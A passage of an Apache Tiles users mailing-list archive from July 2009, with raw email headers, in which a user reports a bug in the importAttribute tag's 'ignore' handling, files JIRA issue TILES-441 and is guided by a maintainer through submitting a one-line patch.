vizi+Jmv9aIlEbppqjjRcZJ9AlyHyqKuxdjwA= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id h3mr8491511bkr.66.1247737816143; Thu, 16 Jul 2009 02:50:16 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> Date: Thu, 16 Jul 2009 11:50:16 +0200 Message-ID: <[email protected]> Subject: Re: Issue with putAttribute tag From: Antonio Petrelli <[email protected]> To: [email protected] Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org 2009/7/16 Roshni Basu <[email protected]>: > I changed the above piece of code to > =A0if (attributeValue =3D=3D null&& !ignore) { > =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0throw new TilesJspExceptio= n( > =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0"Error imp= orting attributes. " + "Attribute > '" > =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 = =A0 =A0+ name + "' has a null value "); > =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0} > > And ignore=3D"true" worked. I think this is a bug in Tiles2.1.2. =A0Can y= ou > kindly check this issue? I think you are right, this is a bug. Can you open a JIRA issue and, if possible, post a patch to it? (best if it is against the SVN trunk of TILES_2_1_X branch): https://issues.apache.org/struts/browse/TILES Thanks Antonio From [email protected] Thu Jul 16 10:30:48 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 56166 invoked from network); 16 Jul 2009 10:30:48 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Jul 2009 10:30:48 -0000 Received: (qmail 35620 invoked by uid 500); 16 Jul 2009 10:31:53 -0000 Delivered-To: [email protected] Received: (qmail 35590 invoked by uid 500); 16 Jul 2009 10:31:53 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <users.tiles.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 35580 invoked by uid 99); 16 Jul 2009 10:31:53 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 16 Jul 2009 10:31:53 +0000 X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-fx0-f222.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 16 Jul 2009 10:31:44 +0000 Received: by fxm22 with SMTP id 22so17746fxm.8 for <[email protected]>; Thu, 16 Jul 2009 03:31:23 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:in-reply-to:references :date:message-id:subject:from:to:content-type; bh=CkGd67F0V6Uxxs7etIV++AUj2woZ7EWmUdINeDZYxQA=; b=oIMdKeWZaNb0uPbkLjaBiOZQsvHlwKnaj2qNCYO/NOtR3tb+K0Yh/9fnUjWkb/AoMH JiJqKHEmUuaw+Ayke5GBT/8mAsyyUxEnQsxGjpzHIvMOr1I4911rtiwYzFNHdQq/ppiR CInVYqh3+NKUwcodQMnk741TuZopFgQvvq8Ic= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type; b=ip86BJSHtG7GerPPEa6JCDygpPJZT3CFUVFlf2r41GnZZMa3v1jWy0H2ynzwBDoBLr VFf74ueSHZmakUi7K+UCcp6EqbCyoL2gY6z62K5640xLxC2iV/cA7iKYbrTYgXZEZ+6b 2cNV9HQa8bAkHKLz/6CmckamVOwSwBjjWIsoE= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id 4mr706232hbk.17.1247740283708; Thu, 16 Jul 2009 03:31:23 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> Date: Thu, 16 Jul 2009 16:01:23 +0530 Message-ID: <[email protected]> Subject: Re: Issue with putAttribute tag From: Roshni Basu <[email protected]> To: [email protected] Content-Type: multipart/alternative; boundary=00163649906961e5be046ed02cc3 X-Virus-Checked: Checked by ClamAV on apache.org --00163649906961e5be046ed02cc3 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Hi Antonio, I have created a bug in JIRA , TILES-441<https://issues.apache.org/struts/browse/TILES-441>. I'm not sure of how to post a patch to it. On Thu, Jul 16, 2009 at 3:20 PM, Antonio Petrelli < [email protected]> wrote: > 2009/7/16 Roshni Basu <[email protected]>: > > I changed the above piece of code to > > if (attributeValue == null&& !ignore) { > > throw new TilesJspException( > > "Error importing attributes. " + > "Attribute > > '" > > + name + "' has a null value "); > > } > > > > And ignore="true" worked. I think this is a bug in Tiles2.1.2. Can you > > kindly check this issue? > > I think you are right, this is a bug. Can you open a JIRA issue and, > if possible, post a patch to it? (best if it is against the SVN trunk > of TILES_2_1_X branch): > https://issues.apache.org/struts/browse/TILES > > Thanks > Antonio > --00163649906961e5be046ed02cc3-- From [email protected] Thu Jul 16 10:39:49 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 60740 invoked from network); 16 Jul 2009 10:39:48 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Jul 2009 10:39:48 -0000 Received: (qmail 61049 invoked by uid 500); 16 Jul 2009 10:40:54 -0000 Delivered-To: [email protected] Received: (qmail 61025 invoked by uid 500); 16 Jul 2009 10:40:54 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <users.tiles.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 61015 invoked by uid 99); 16 Jul 2009 10:40:54 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 16 Jul 2009 10:40:54 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-bw0-f211.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 16 Jul 2009 10:40:46 +0000 Received: by bwz7 with SMTP id 7so22199bwz.8 for <[email protected]>; Thu, 16 Jul 2009 03:40:25 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:in-reply-to:references :date:message-id:subject:from:to:content-type :content-transfer-encoding; bh=9knztWjRX1O1u3/xeYE4Gl+U95vfnAdfl7GivqheqIM=; b=wUuDprzst0XvLsfswxpy7MF/XnfbW2yl0ih9/a595FvyCiL2rD9J5Yfz44LVECmG/N gGwv6tp1zadlSo8Bs3jSrZBCGY1lT9QZdfWj/p5jYL1h0O0Hl19gruEEziRMkFz+Uftm uID2KyF8GQVJRJnkubJH/irAarocj2uNjAejk= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type:content-transfer-encoding; b=hiZSWu5Fi/wlk5TBjqEWGr3uv+lfbCocMgp6yrmAzFuiIwzkoT3prPbrEpzbD4SJhp /NETXR1m9xwhbX6V6erXVT0wul9rLG0sj1j4Aobb9ATaJdfwxIbDcd+qolwOhsYJGtYM jQLp12zVTS9DU+myZuOiC54yyqPccYv2RPIEQ= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id f2mr8693324bkg.90.1247740824765; Thu, 16 Jul 2009 03:40:24 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> Date: Thu, 16 Jul 2009 12:40:24 +0200 Message-ID: <[email protected]> Subject: Re: Issue with putAttribute tag From: Antonio Petrelli <[email protected]> To: [email protected] Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org 2009/7/16 Roshni Basu <[email protected]>: > Hi Antonio, > > I have created a bug in JIRA , > TILES-441<https://issues.apache.org/struts/browse/TILES-441>. > > I'm not sure of how to post a patch to it. At Struts website they have a FAQ about it: http://struts.apache.org/helping.html#patches The subversion repository is here: http://svn.eu.apache.org/repos/asf/tiles/framework/branches/TILES_2_1_X/ However, for your particular case, since it is a simple fix, you can write the to fix as a comment to the issue. Anyway, the patch is the preferred way because it provides the easiest way to review and commit a fix. Antonio From [email protected] Thu Jul 16 11:04:56 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 67149 invoked from network); 16 Jul 2009 11:04:56 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Jul 2009 11:04:56 -0000 Received: (qmail 3328 invoked by uid 500); 16 Jul 2009 11:06:01 -0000 Delivered-To: [email protected] Received: (qmail 3298 invoked by uid 500); 16 Jul 2009 11:06:01 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <users.tiles.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 3288 invoked by uid 99); 16 Jul 2009 11:06:01 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 16 Jul 2009 11:06:01 +0000 X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-bw0-f211.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 16 Jul 2009 11:05:52 +0000 Received: by bwz7 with SMTP id 7so34792bwz.8 for <[email protected]>; Thu, 16 Jul 2009 04:05:31 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:in-reply-to:references :date:message-id:subject:from:to:content-type; bh=5Ii/BdRYn70mbgIi4/wN/51XBPdWBjD4VhESK6v2tqk=; b=da1OJKnQ4ojzxvlQEyLQzorPegmV87U7UTjscoEVLKhZCbsVJYIwzIw7bTxwJI2Mmo rz3qzgfZ3jglH2GCPTxMjBf5ssQR0UwXuY9L+vNvEpOABKcxDVpROJTz+RKwk6Gx01H8 xFtnk79U+wwtjydTq3CbwDemXuh0Xa6eOPV1o= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type; b=omd+WtD836OqYpd4EOF0dKo9x0iuvOoA3DreKBGueg5I9XYIPFgpIuCeLoJD7Da0Kx 4wbmAO1JBEQE2pFn/K/7qNZBHmmH0joqiYk87pkYI67SQWHoOXXLivXLWRufSdIETTLU t0pw6RLz8v75yWZluXbzxti9muKR+RuSB8tE0= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id k5mr611050hbk.111.1247742331779; Thu, 16 Jul 2009 04:05:31 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> Date: Thu, 16 Jul 2009 16:35:31 +0530 Message-ID: <[email protected]> Subject: Re: Issue with putAttribute tag From: Roshni Basu <[email protected]> To: [email protected] Content-Type: multipart/alternative; boundary=001485f4241274fb5c046ed0a62f X-Virus-Checked: Checked by ClamAV on apache.org --001485f4241274fb5c046ed0a62f Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Hi You have put a comment on the bug saying the check is there in 2.2.0. But is not the recent tiles version 2.1.3? I'm confused. On Thu, Jul 16, 2009 at 4:10 PM, Antonio Petrelli < [email protected]> wrote: > 2009/7/16 Roshni Basu <[email protected]>: > > Hi Antonio, > > > > I have created a bug in JIRA , > > TILES-441<https://issues.apache.org/struts/browse/TILES-441>. > > > > I'm not sure of how to post a patch to it. > > At Struts website they have a FAQ about it: > http://struts.apache.org/helping.html#patches > The subversion repository is here: > http://svn.eu.apache.org/repos/asf/tiles/framework/branches/TILES_2_1_X/ > However, for your particular case, since it is a simple fix, you can > write the to fix as a comment to the issue. > Anyway, the patch is the preferred way because it provides the easiest > way to review and commit a fix. > > Antonio > --001485f4241274fb5c046ed0a62f-- From [email protected] Thu Jul 16 11:12:37 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 68875 invoked from network); 16 Jul 2009 11:12:37 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Jul 2009 11:12:37 -0000 Received: (qmail 15960 invoked by uid 500); 16 Jul 2009 11:13:42 -0000 Delivered-To: [email protected] Received: (qmail 15912 invoked by uid 500); 16 Jul 2009 11:13:42 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <users.tiles.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 15902 invoked by uid 99); 16 Jul 2009 11:13:42 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 16 Jul 2009 11:13:42 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-bw0-f211.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 16 Jul 2009 11:13:34 +0000 Received: by bwz7 with SMTP id 7so38696bwz.8 for <[email protected]>; Thu, 16 Jul 2009 04:13:13 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:in-reply-to:references :date:message-id:subject:from:to:content-type :content-transfer-encoding; bh=jznasA8evmpDhkf3RHrtNjKq0jPatJYvGCVwONCDohY=; b=NKDnm5wiDxLQsi7ne5lpQfmX0AL/N8/sQGyx/SNrb9++hh0x5Rw3kruJUjWNpF2EG/ 3oefP7zPXLmZkcyvwFBjUj6t9id+PoNwKIANCyw/lhBds2OAHusisFopibaTw+aVHHnz Z0hAOQ8fl9M4uP846zu0GwWmBR8sh9MXcmBX0= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type:content-transfer-encoding; b=xSMKAm4/DfdEMzZ9/DLCGzeDv+LryaNlSy+8+qJI2M5YNrdYrU7G5kZ8j9OM3+lPT2 pmB18ShOyqlFRC2ewHtPzYbz3gR7+sm74weMrhc8676S6zVNwDUL20Eun2ClyFwTno+U d9qgo27Aj/Sy+SJOiVNWkfmEgD0Jk2aChu1zU= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id a1mr4449340fas.52.1247742792824; Thu, 16 Jul 2009 04:13:12 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> Date: Thu, 16 Jul 2009 13:13:10 +0200 Message-ID: <[email protected]> Subject: Re: Issue with putAttribute tag From: Antonio Petrelli <[email protected]> To: [email protected] Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org 2009/7/16 Roshni Basu <[email protected]>: > Hi You have put a comment on the bug saying the check is there in 2.2.0. > But is not =A0the recent tiles version =A02.1.3? > I'm confused. Sorry, I forgot to specify better what 2.2.0 version means. I edited the comment. Antonio From [email protected] Thu Jul 16 11:27:17 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 74314 invoked from network); 16 Jul 2009 11:27:17 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Jul 2009 11:27:17 -0000 Received: (qmail 43365 invoked by uid 500); 16 Jul 2009 11:28:22 -0000 Delivered-To: [email protected] Received: (qmail 43300 invoked by uid 500); 16 Jul 2009 11:28:22 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <users.tiles.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 43286 invoked by uid 99); 16 Jul 2009 11:28:22 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 16 Jul 2009 11:28:22 +0000 X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-bw0-f211.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 16 Jul 2009 11:28:14 +0000 Received: by bwz7 with SMTP id 7so46203bwz.8 for <[email protected]>; Thu, 16 Jul 2009 04:27:52 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:in-reply-to:references :date:message-id:subject:from:to:content-type; bh=bfGpcBsVUXcSmlYsIjimn8gGt6+S422T0f5N1MISlvM=; b=GoC0GjAaiPL9r/e7/Ygh9a68kS5Q7rKsDoGJGvRQuYfNq6fLoh9byW/pNURccZCqJQ jJCMTnwezvPocbkJ/czO6q8T+lqDhrHC94H7l9fZ/Or0hkT6ZpQbyEwxwZ16FuwXOsca W8IzA621GkzaSTZWaQHiQV/Dek8RYXLKAaDl8= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type; b=uZEWn+6nBxCDl1I3YxIwsa43a56cQtFbSIJr46c7ZyURLa//lZSRHIOlBAfcqqR7TF GACvjbDOBYW/lWvgZNGceKKMtXstBv1Skqn+9RpwvxIo7G3nSVc31FxycajlCvNgCNu0 eb3ihn2KmMY+p3N9ab+NLH6gne3ZbZvuiiSZ8= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id g10mr664354hbd.92.1247743672468; Thu, 16 Jul 2009 04:27:52 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> Date: Thu, 16 Jul 2009 16:57:52 +0530 Message-ID: <[email protected]> Subject: Re: Issue with putAttribute tag From: Roshni Basu <[email protected]> To: [email protected] Content-Type: multipart/alternative; boundary=001485f336765e4423046ed0f667 X-Virus-Checked: Checked by ClamAV on apache.org --001485f336765e4423046ed0f667 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit I have created a patch have not attached it yet. It looks like this: Index: ImportAttributeTag.java =================================================================== --- ImportAttributeTag.java (revision 794627) +++ ImportAttributeTag.java (working copy) @@ -119,7 +119,7 @@ if (attr != null) { try { Object attributeValue = container.evaluate(attr, pageContext); - if (attributeValue == null) { + if (attributeValue == null && !ignore) { throw new TilesJspException( "Error importing attributes. " + "Attribute '" + name + "' has a null value "); I guess - represents that line is removed and + represents the line is added. Should I attach this with the bug that I have created? On Thu, Jul 16, 2009 at 4:43 PM, Antonio Petrelli < [email protected]> wrote: > 2009/7/16 Roshni Basu <[email protected]>: > > Hi You have put a comment on the bug saying the check is there in 2.2.0. > > But is not the recent tiles version 2.1.3? > > I'm confused. > > Sorry, I forgot to specify better what 2.2.0 version means. I edited > the comment. > > Antonio > --001485f336765e4423046ed0f667-- From [email protected] Thu Jul 16 12:19:52 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 91602 invoked from network); 16 Jul 2009 12:19:52 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Jul 2009 12:19:52 -0000 Received: (qmail 19150 invoked by uid 500); 16 Jul 2009 12:20:57 -0000 Delivered-To: [email protected] Received: (qmail 19091 invoked by uid 500); 16 Jul 2009 12:20:57 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <users.tiles.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 19081 invoked by uid 99); 16 Jul 2009 12:20:57 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 16 Jul 2009 12:20:57 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-bw0-f211.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 16 Jul 2009 12:20:49 +0000 Received: by bwz7 with SMTP id 7so74122bwz.8 for <[email protected]>; Thu, 16 Jul 2009 05:20:28 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:in-reply-to:references :date:message-id:subject:from:to:content-type :content-transfer-encoding; bh=4xxIz4dYzHYmAKb9w2jESbDDgTZtdtcRiWg9fw7D1tM=; b=eitgx5Zj5IKKFUcFXS0rKEVacjLUb4WhPvLwxeoxfpHtW+8VulAwUFp9u+HBVHhpKn BNA33egqeSr+/W4VvbpaHCdNi055eGyM04YXtNqmfrOpEMnKA1L0ooTCYcR2R1IEkR3f ff9RsmtJ6xmEVT/zPPTlpBIivwZHri5+Optdk= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type:content-transfer-encoding; b=QKYEzQGoM8rdQ+irYmfIwKvIGFN0kwLYguVjpRYEyTwk/z5uK7/rbg+FMp/0FgzipF vnbAtjxU0R6mH4dkoNjLpQ7rLjgN8BDx0Glr8c8EFYaewb/xmsFuBuZp40TF0UdOLkMf B3vBp5g2D6IC2jKx7FOApSGXPEdzGeZXyKMcA= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id p13mr4467347far.84.1247746827568; Thu, 16 Jul 2009 05:20:27 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> Date: Thu, 16 Jul 2009 14:20:27 +0200 Message-ID: <[email protected]> Subject: Re: Issue with putAttribute tag From: Antonio Petrelli <[email protected]> To: [email protected] Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org 2009/7/16 Roshni Basu <[email protected]>: > I guess - represents that line is removed and + represents the line is > added. Right. The benefit is that this code is interpreted by "patch" command to apply it to the code. > =A0Should I attach this with =A0the bug that I have created? I noticed that you already did it, so thank you! Antonio From [email protected] Fri Jul 17 11:27:45 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 80964 invoked from network); 17 Jul 2009 11:27:45 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 17 Jul 2009 11:27:45 -0000 Received: (qmail 43795 invoked by uid 500); 17 Jul 2009 11:28:50 -0000 Delivered-To: [email protected] Received: (qmail 43734 invoked by uid 500); 17 Jul 2009 11:28:50 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <users.tiles.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 43724 invoked by uid 99); 17 Jul 2009 11:28:50 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 17 Jul 2009 11:28:50 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO kuber.nabble.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 17 Jul 2009 11:28:39 +0000 Received: from isper.nabble.com ([161.129.204.104]) by kuber.nabble.com with esmtp (Exim 4.63) (envelope-from <[email protected]>) id 1MRlbv-0001iu-48 for [email protected]; Fri, 17 Jul 2009 04:28:19 -0700 Message-ID: <[email protected]> Date: Fri, 17 Jul 2009 04:28:19 -0700 (PDT) From: Roshni Basu <[email protected]> To: [email protected] Subject: Source code for 2.1.3 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-Nabble-From: [email protected] X-Virus-Checked: Checked by ClamAV on apache.org Hi Antonio, >From where do I download the source code for tiles 2.1.3? -- View this message in context: http://www.nabble.com/Source-code-for-2.1.3-tp24532766p24532766.html Sent from the tiles users mailing list [email protected]. From [email protected] Fri Jul 17 12:51:54 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 16491 invoked from network); 17 Jul 2009 12:51:54 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 17 Jul 2009 12:51:54 -0000 Received: (qmail 41461 invoked by uid 500); 17 Jul 2009 12:53:00 -0000 Delivered-To: [email protected] Received: (qmail 41396 invoked by uid 500); 17 Jul 2009 12:53:00 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <users.tiles.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 41386 invoked by uid 99); 17 Jul 2009 12:53:00 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 17 Jul 2009 12:53:00 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-fx0-f222.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 17 Jul 2009 12:52:50 +0000 Received: by fxm22 with SMTP id 22so687815fxm.8 for <[email protected]>; Fri, 17 Jul 2009 05:52:30 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:in-reply-to:references :date:message-id:subject:from:to:content-type :content-transfer-encoding; bh=pgkyci5+KMtA5cTqKPnSkrmg51YNH+NV967dociSlc8=; b=nh+7Z4NFABQxSemXkd/zIvkBaBFInRubx8q7bEFF64Df1JaYOdy5xl4t4CeCofuxN1 g7pdgU+D/xJJF8dbfrDa1JB8VeU4RgjZU0lfg8EtZEa77ibantxUX/4CrouuSYrwX471 nk3KLnvOtZz1t9Hb0iAtofN4REM9c6oxI9zeU= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type:content-transfer-encoding; b=ZbeE7PYngiP/evuukzrGKyZn2ujNaW8QbdWxWs37sIo1uOvR7xYGhErY1Et4fYkGem 2WuUtFWOoGUxNJaAO+Lp8TwWxV35hBsBe3smEirThyGvyGk73u62nkz9b+XLE2gsgjCl LE8mncJXVE6SC2JNBolqCBTBbp8cU/UvLufxw= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id l13mr354918far.99.1247835150460; Fri, 17 Jul 2009 05:52:30 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> Date: Fri, 17 Jul 2009 14:52:30 +0200 Message-ID: <[email protected]> Subject: Re: Source code for 2.1.3 From: Antonio Petrelli <[email protected]> To: [email protected] Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org 2009/7/17 Roshni Basu <[email protected]>: > > Hi Antonio, > > From where do =A0I download the source code for tiles 2.1.3? See the download page: http://tiles.apache.org/download.html At the "source distribution" section. Antonio From [email protected] Fri Jul 17 15:26:44 2009 